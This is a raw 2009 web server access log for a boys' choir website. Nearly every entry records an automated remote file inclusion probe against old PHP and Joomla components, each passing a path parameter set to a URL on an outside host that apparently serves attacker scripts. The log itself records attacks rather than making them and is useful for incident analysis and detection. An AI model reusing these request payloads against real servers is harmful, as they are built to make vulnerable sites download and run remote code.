84.207.17.120 - - [04/Jul/2009:12:53:46 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:53:46 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:53:47 -0700] "GET /logs/access_090517.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:53:47 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:53:48 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:55:11 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:55:18 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
41.240.0.131 - - [04/Jul/2009:12:55:19 -0700] "GET /index.php?page=http://emailsgeral.xpg.com.br/bot/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
41.240.0.131 - - [04/Jul/2009:12:55:19 -0700] "GET /logs/access.log/index.php?page=http://emailsgeral.xpg.com.br/bot/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
41.240.0.131 - - [04/Jul/2009:12:55:19 -0700] "GET /logs/index.php?page=http://emailsgeral.xpg.com.br/bot/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:56:05 -0700] "GET /logs/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:56:05 -0700] "GET /logs/access_090622.log/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:56:05 -0700] "GET /dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:57:17 -0700] "GET /logs/access.log//?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:57:17 -0700] "GET /?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 200 1724 "-" "libwww-perl/5.808" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:57:17 -0700] "GET /logs//?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 200 1086 "-" "libwww-perl/5.808" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:20 -0700] "GET /logs/access_090622.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:20 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:20 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:26 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:26 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:12:57:27 -0700] "GET /logs/access_090622.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:58:22 -0700] "GET /logs/access_090622.log%20%20/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /logs/access_090622.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /logs/access_090622.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:58:58 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:59:00 -0700] "GET /logs/access.log%20%20/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:59:54 -0700] "GET /logs/access_090622.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:13:00:05 -0700] "GET /logs/access_090622.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.34.42 - - [04/Jul/2009:13:00:25 -0700] "GET /logs/errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
218.38.34.42 - - [04/Jul/2009:13:00:25 -0700] "GET /errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:00:49 -0700] "GET /logs/access_090622.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:00:51 -0700] "GET /logs/access_090622.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:02:08 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:02:08 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:13:02:26 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:13:02:44 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:03:25 -0700] "GET /logs//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:03:25 -0700] "GET /?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:03:25 -0700] "GET /logs/access.log%20%20//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:13:03:28 -0700] "GET /logs/access_090629.log/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.180.70.168 - - [04/Jul/2009:13:03:35 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.de/search?hl=de&safe=off&q=intitle%3Aindex.of.xxx&btnG=Suche&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.americanboyschoir.com"
85.180.70.168 - - [04/Jul/2009:13:03:36 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.americanboyschoir.com"
85.180.70.168 - - [04/Jul/2009:13:03:37 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.americanboyschoir.com"
85.180.70.168 - - [04/Jul/2009:13:03:39 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.americanboyschoir.com"
85.180.70.168 - - [04/Jul/2009:13:03:40 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:04:47 -0700] "GET /logs//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:04:47 -0700] "GET /?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:04:47 -0700] "GET /logs/access.log%20%20//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:05:21 -0700] "GET ////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:05:21 -0700] "GET /logs/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:05:21 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:13:06:37 -0700] "GET /logs/access.log//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:06:38 -0700] "GET ////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:06:38 -0700] "GET /logs/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:06:38 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:06:51 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:07:37 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:07:38 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:07:38 -0700] "GET /logs/access_090622.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:08:12 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:12:16 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:12:21 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:13:15 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:13:24 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:15:04 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:15:30 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:16:03 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:16:29 -0700] "GET /logs/access_090626.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:18:38 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:19:09 -0700] "GET /logs/access_090626.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:21:17 -0700] "GET /logs/access_090620.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:22:24 -0700] "GET /logs/access_090620.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:31:24 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:32:27 -0700] "GET /logs/access_090626.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:33:55 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:13:35:51 -0700] "GET /logs/access_090629.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:13:35:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:13:35:58 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:13:35:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:39:05 -0700] "GET /logs/access_090517.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:39:15 -0700] "GET /logs/access_090517.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:40:44 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:40:44 -0700] "GET /logs/access.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:40:44 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:40:59 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:32 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:32 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:34 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:34 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:35 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:43:37 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
